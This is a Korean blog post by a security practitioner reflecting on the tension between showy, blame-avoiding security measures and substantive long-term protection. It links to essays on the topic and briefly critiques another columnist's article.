현실과 이상의 괴리는 생각하는 대로 발생하지 않는다는 점에 있습니다. 눈에 보이는 부분이라도
어떻게 강화를 해야 책임추궁을 피하고 면피할 일들이 생기는 것이긴 하나 근본적인 문제의 해결과는 매우 다른 이야기가 됩니다.

여기에서 현업 담당자의 딜레마가 시작이 되는 것이죠. 어떤 방향을 추구하느냐에 따라
허우대만 번쩍하는 것이냐 내공이 있는 그 무엇이 되느냐가 됩니다. ( 개인적으로는 내공을 추구합니다. 물론 어려움이 많지만...)

어떤 방향이 옳을까요?. 단기적인 성과 혹은 장기적인 안정 . 또 그만큼의 시간을 줄만큼 여유와 인내가 있을런지..

연휴동안 보안 관련된 기사나 글들을 읽다보니 느끼는 점이 많은 글이여서 올려 봅니다.


이하 기사는 URL을 참조 하십시요.

 

http://www.schneier.com/essay-087.html  ( English )

http://wired.daum.net/business/article00350.shtm (Korean)

 

Posted by 바다란


의미 있는 이야기들도 다수 있습니다. 현장에서 보안 분야의 일을 직접 수행하는 컬럼리스트로 보이네요.
현실적인 문제들에 대한 이야기도 있고 현재의 위협을 간과하는 것들도 있고..

아이디어들도 몇개 보입니다.  제목과 글 내용이 매칭이 되지 않는 점만 빼고는 ...
일반적인 의견으로 보면 4번 항목을 제외하고는 긍정할 만 합니다.  딱 일반적이고 피상적으로 눈에 보이는  문제들을 짚었구요.. 일반론 적인 이야기 여서 참고 삼아 보시면 될 듯 싶습니다. 

보안업무를 하면서 보면 딱 말로만 잘하는 타입의 사람을 보게 되는데 글을 쓴 컬럼리스트의 경우도 그에 해당하지 않나 싶습니다. 다만 기술적인 부분이 아주 쪼금 언급이라도 되어서 다행입니다만...

 

해외의 경우에는 변화도나 발전도가 그리 빠르지 않아서 기술이 중요하지 않을지 몰라도..

정신없이 발전하는 우리의 경우는 전 세계로 부터 테스트 베드가 되다보니 또한 기질상 빠른 적용으로 인해 새로운 문제들이 날이 갈수록 출현하고 있어서 기술적인 진보와 커버리지가 매우 중요합니다. 상황에 따라 다른 이야기 이겠죠.. 우리의 현실과는 맞기도 하면서 다른 부분도 있는 그런 이야기 입니다.

 

그럼 좋은 하루 되십시요.

=========================================================

 

http://news.naver.com/news/read.php?mode=LSS2D&office_id=092&article_id=0000005157&section_id=105&section_id2=283&menu_id=105


 

'Security Indicator' 카테고리의 다른 글

텔레뱅킹 -해킹  (0) 2010.04.27
진정한 넷보안이란?  (0) 2010.04.27
최악의 기업 보안 사례 5  (0) 2010.04.27
진정한 넷보안이란?  (0) 2010.04.27
중국발 사이버 침해 - 조직적, 대규모  (0) 2010.04.27
중국발 해킹 대규모 확산 우려  (0) 2010.04.27
Posted by 바다란